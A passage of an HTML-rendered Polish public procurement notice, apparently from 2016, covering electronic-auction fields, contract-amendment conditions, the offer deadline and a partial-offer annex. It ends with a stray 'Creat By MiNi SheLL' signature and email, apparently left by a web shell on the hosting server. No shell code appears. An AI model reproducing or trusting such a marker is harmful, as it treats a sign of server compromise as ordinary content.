               Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
               <br />
               nie
               <br />
               Informacje dodatkowe:
               <br />
               <br />
               <b>IV.4) Licytacja elektroniczna</b>
               <br />
               Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
               <br />
               <div style="padding-left: 20px" />
               Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
               <br />
               <div style="padding-left: 20px" />
               Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
               <br />
               <div style="padding-left: 20px" />
               Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
               <br />
               <div style="padding-left: 20px" />
               Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:
               <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table>
                     <tr>
                        <td>etap nr</td>
                        <td>czas trwania etapu</td>
                     </tr>
                     <tr>
                        <td />
                        <td />
                     </tr>
                  </table>
                  <br />
                  Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
               </div>
               Termin otwarcia licytacji elektronicznej:
               <br />
               <div style="padding-left: 20px" />
               Termin i warunki zamknięcia licytacji elektronicznej:
               <br />
               <div style="padding-left: 20px" />
               <br />
               Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
               <br />
               <div style="padding-left: 20px" />
               <br />
               Wymagania dotyczące zabezpieczenia należytego wykonania umowy:
               <br />
               <div style="padding-left: 20px" />
               <br />
               Informacje dodatkowe:
               <br />
               <div style="padding-left: 20px" />
               <b>IV.5) ZMIANA UMOWY</b>
               <br />
               <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
               tak
               <br />
               Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
               <br />
               1. Zamawiający, zgodnie z art. 144 ustawy Prawo zamówień publicznych, przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
    a) siły wyższej (rozumianej jako zdarzenie zewnętrzne, niemożliwe do przewidzenia, którego skutkom nie można było zapobiec) uniemożliwiającej wykonanie przedmiotu umowy zgodnie z SIWZ  odstąpienie od umowy bez naliczania kar umownych, przedłużenie terminu realizacji umowy, zmniejszenie zakresu realizacji umowy;
    b) zmiany terminu wykonania przedmiotu umowy, o którym mowa w następującym zakresie:
    -	jeżeli umowa nie może być wykonana w terminie z przyczyn leżących po stronie Zamawiającego;
    -	jeżeli umowa nie może być wykonana w terminie z przyczyn niezawinionych przez Wykonawcę;
    c) istotnych zmian w przepisach ustawowych i aktach wykonawczych związanych z przedmiotem zamówienia, które nastąpiły po dniu podpisania umowy;
    d) w przypadku zmiany ustawowej stawki VAT wartość należnego wynagrodzenia zostanie skorygowana o wartość należnego podatku poprzez dodanie do wartości netto wartości należnego podatku VAT, zgodnie z obowiązującymi w tym zakresie przepisami prawa  zmiana wynagrodzenia Wykonawcy (brutto);
    e) gdy istnieje inna okoliczność prawna, ekonomiczna lub techniczna skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ  przedłużenie terminu realizacji umowy, zmniejszenie zakresu realizacji umowy, odstąpienie od realizacji umowy bez naliczania kar umownych;
    f) rezygnacji przez zamawiającego z części przedmiotu umowy  zmniejszenie wynagrodzenia wykonawcy;
    2. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych pkt 1 termin realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia jego wykonania w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
    3. Strony umowy ustalają nowe terminy realizacji zamówienia, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy będzie równy okresowi przerwy lub przestoju. Dodatkowo przyczyna i okres przesunięcia terminu będzie musiał być szczegółowo uzasadniony przez Wykonawcę i zaakceptowany przez Zamawiającego.
    4. O wystąpieniu jakichkolwiek okoliczności mogących wpłynąć na terminowość wykonania przedmiotu umowy Wykonawca jest zobowiązany powiadomić Zamawiającego na piśmie w terminie 7 dni od dnia wystąpienia tych okoliczności, pod rygorem nieuwzględnienia ich przez Zamawiającego.
    5. Wszystkie postanowienia wymienione pkt 1 stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody
    6. Za siłę wyższą, o której mowa w niniejszej umowie, strony uznają zdarzenia nadzwyczajne, zewnętrzne o charakterze nadzwyczajnym, niezależne od woli Stron po zawarciu niniejszej umowy, które nie udało się zapobiec przy zachowaniu należytej staranności, skutkujące niemożliwością prowadzenia robót, a w szczególności epidemią stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym. Działaniem siły wyższej będą również niesprzyjające warunki atmosferyczne (np. długotrwałe i intensywne opady deszczu, silny wiatr powodzie) powodujące utrudnienia w realizacji przedmiotu umowy lub uniemożliwiające wykonanie prac zgodnie z założoną technologią wykonania robót.
    7. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy: a) zmiana danych związanych z obsługą administracyjno - organizacyjną umowy np.: zmiana numeru rachunku bankowego, b) zmiana danych teleadresowych
    8. Z okoliczności stanowiących podstawę zmiany do umowy Wykonawca sporządzi protokół, który zostanie podpisany przez Strony umowy.
    9. Zmiana umowy powinna nastąpić w formie pisemnego aneksu sporządzonego przez Zamawiającego i pod-pisanego przez strony umowy, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
    10. Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
               <br />
               <b>IV.6) INFORMACJE ADMINISTRACYJNE</b>
               <br />
               <br />
               <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym</b>
               <i>(jeżeli dotyczy):</i>
               <br />
               <br />
               <b>Środki służące ochronie informacji o charakterze poufnym</b>
               <br />
               <br />
               <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu:</b>
               <br />
               Data: 14/09/2016, godzina: 10:00,
               <br />
               Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
               <br />
               nie
               <br />
               Wskazać powody:
               <br />
               <br />
               Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
               <br />
               &gt;
              polski
               <br />
               <b>IV.6.3) Termin związania ofertą:</b>
               okres w dniach: 30 (od ostatecznego terminu składania ofert)
               <br />
               <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
               tak
               <br />
               <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
               nie
               <br />
               <b>IV.6.6) Informacje dodatkowe:</b>
               <br />
            </div>
         </div>
         <div style="text-align: center" class="headerLarge_xforms">
            <u>ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</u>
         </div>
         <div>
            <b>Część nr:</b>
              
            <b>Nazwa:</b>
            <br />
            <div style="padding-left: 20px">
               <b>1) Krótki opis przedmiotu zamówienia</b>
               <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i>
               <b>a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
               <br />
               <b>2) Wspólny Słownik Zamówień (CPV):</b>
               <br />
               <b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b>
               <br />
               Wartość bez VAT:
               <br />
               Waluta:
               <br />
               <div style="padding-left: 20px">
                  <br />
                  <b>4) Czas trwania lub termin wykonania:</b>
                  okres w dniach: 56
                  <br />
                  <b>5) Kryteria oceny ofert:</b>
                  <table style="padding-left: 20px">
                     <tr>
                        <td>
                           <i>Kryteria</i>
                        </td>
                        <td>
                           <i>Znaczenie</i>
                        </td>
                     </tr>
                     <tr>
                        <td />
                        <td />
                     </tr>
                  </table>
                  <b>6) INFORMACJE DODATKOWE:</b>
                  <br />
               </div>
            </div>
            <br />
         </div>
      </div>
   

Creat By MiNi SheLL
Email: jattceo@gmail.com